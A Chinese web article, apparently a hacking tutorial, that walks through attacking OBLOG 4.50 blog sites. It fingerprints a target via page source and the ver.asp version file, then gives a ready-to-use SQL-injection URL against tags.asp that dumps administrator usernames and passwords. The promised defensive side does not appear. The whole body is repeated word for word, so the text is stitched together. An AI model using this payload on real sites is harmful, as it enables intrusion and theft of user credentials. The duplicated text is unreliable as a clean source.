教你一句话让OBLOG将用户密码乖乖送上
网络安全 2021-07-03 10:05www.168986.cn网络安全知识
随着网络技术的逐步发展,越来越多的企业拥有了自己的网站平台,通过此平台对外宣传自己,对内让员工可以更好的交流技术问题与工作事宜。OBLOG作为一款多用户博客发布系统在一定程序上满足了企业的上述种种需求,很多企业通过OBLOG安装程序搭建简单的站点交流平台,你是否知道我们只需要一句话就可以让OBLOG系统将全部用户密码乖乖送给入侵者吗?今天我们就从攻防两个角度来看看入侵者是如何通过一句话让OBLOG将用户密码乖乖送上的。
一,判断平台类型以及系统版本
在任何一次入侵之前非法入侵者都要针对目标站点,目标系统,目标服务器进行必要的信息收集工作,这也是最快的发现漏洞所在的方法。当我们将一个网站作为攻击目标时,可以通过查看主页的“源文件”来判断其使用的站点搭建系统类型,然后在通过对应的命令查看站点搭建系统的版本。狼蚁网站SEO优化笔者就从攻击实例出发进行介绍。
第一步我们锁定了一个内部网站,我们不知道该站点是使用什么类型的程序搭建的,那么我们可以通过在首页点“查看->源文件”,然后在打开的index页面源文件中查找相关信息,对于没有太多丰富经验的站点管理员来说并不会对全部版本信息进行修改,所以我们可以通过index页面源文件的开头或结尾查找到有用的信息。如果站点管理员经验丰富的话,他会把所有蛛丝马迹的版本泄露字眼都删除点。
第二步经过笔者查询发现在index页面结尾处有.oblog.的字样,看来这个站点系统是由OBLOG程序搭建的。我们也顺利完成了系统类型的判断工作,将入侵主要精力放到了攻击OBLOG系统上。(如图1)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图1
第三步接下来我们通过IE浏览器直接输入http://ip/ver.asp,对于没有经验的网络管理员来说是不会删除这些默认的系统版本泄露文件的,从显示中我们可以看到该OBLOG系统使用的是4.50 final build0619(aess)版,版本为4.5,数据库类型是aess数据库。(如图2)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图2
至此我们就顺利的完成了目标站点的系统收集工作,了解了该站点是通过OBLOG搭建完成,而且使用的OBLOG安装程序是4.50 final build0619,使用的数据库是aess。
二,根据程序与版本漏洞进行入侵
不同版本,不同程序的漏洞不同,入侵方法也不同,对于OBLOG 4.50 final build0619版来说我们可以通过标签法实现入侵目的,利用SQL注入漏洞让OBLOG将全部用户的帐户名与密码显示出来。
第一步通过http://ip/tags.asp命令显示出该OBLOG系统的所有标签信息。(如图3)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图3
第二步我们随意选择一个标签,要求这个标签里面是有内容的,不能为空。里面内容包括名字,发布者与发布时间。还有一点特别重要那就是记下这个标签对应的ID信息,例如笔者选择该标签后上方地址处对应的ID地址信息为“tags.asp?tagid=42”。(如图4)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图4
第三步接下来就是通过一句话对OBLOG系统进行SQL注入入侵了,我们在之前记录的TAGS标签ID信息基础上添加注入命令,例如上面看到的ID地址信息为“tags.asp?tagid=42”,那么我们输入以下内容——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
一,判断平台类型以及系统版本
在任何一次入侵之前非法入侵者都要针对目标站点,目标系统,目标服务器进行必要的信息收集工作,这也是最快的发现漏洞所在的方法。当我们将一个网站作为攻击目标时,可以通过查看主页的“源文件”来判断其使用的站点搭建系统类型,然后在通过对应的命令查看站点搭建系统的版本。狼蚁网站SEO优化笔者就从攻击实例出发进行介绍。
第一步我们锁定了一个内部网站,我们不知道该站点是使用什么类型的程序搭建的,那么我们可以通过在首页点“查看->源文件”,然后在打开的index页面源文件中查找相关信息,对于没有太多丰富经验的站点管理员来说并不会对全部版本信息进行修改,所以我们可以通过index页面源文件的开头或结尾查找到有用的信息。如果站点管理员经验丰富的话,他会把所有蛛丝马迹的版本泄露字眼都删除点。
第二步经过笔者查询发现在index页面结尾处有.oblog.的字样,看来这个站点系统是由OBLOG程序搭建的。我们也顺利完成了系统类型的判断工作,将入侵主要精力放到了攻击OBLOG系统上。(如图1)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图1
第三步接下来我们通过IE浏览器直接输入http://ip/ver.asp,对于没有经验的网络管理员来说是不会删除这些默认的系统版本泄露文件的,从显示中我们可以看到该OBLOG系统使用的是4.50 final build0619(aess)版,版本为4.5,数据库类型是aess数据库。(如图2)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图2
至此我们就顺利的完成了目标站点的系统收集工作,了解了该站点是通过OBLOG搭建完成,而且使用的OBLOG安装程序是4.50 final build0619,使用的数据库是aess。
二,根据程序与版本漏洞进行入侵
不同版本,不同程序的漏洞不同,入侵方法也不同,对于OBLOG 4.50 final build0619版来说我们可以通过标签法实现入侵目的,利用SQL注入漏洞让OBLOG将全部用户的帐户名与密码显示出来。
第一步通过http://ip/tags.asp命令显示出该OBLOG系统的所有标签信息。(如图3)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图3
第二步我们随意选择一个标签,要求这个标签里面是有内容的,不能为空。里面内容包括名字,发布者与发布时间。还有一点特别重要那就是记下这个标签对应的ID信息,例如笔者选择该标签后上方地址处对应的ID地址信息为“tags.asp?tagid=42”。(如图4)
500)this.width=500" title="点击这里用新窗口浏览图片" />
图4
第三步接下来就是通过一句话对OBLOG系统进行SQL注入入侵了,我们在之前记录的TAGS标签ID信息基础上添加注入命令,例如上面看到的ID地址信息为“tags.asp?tagid=42”,那么我们输入以下内容——
http://IP/tags.asp?t=user&keyword=trace&tagid=42 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=42 and 1=2
1
上一篇:介绍七种磁盘加密技术工具
下一篇:妙用DEBUG清除CMOS密码
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座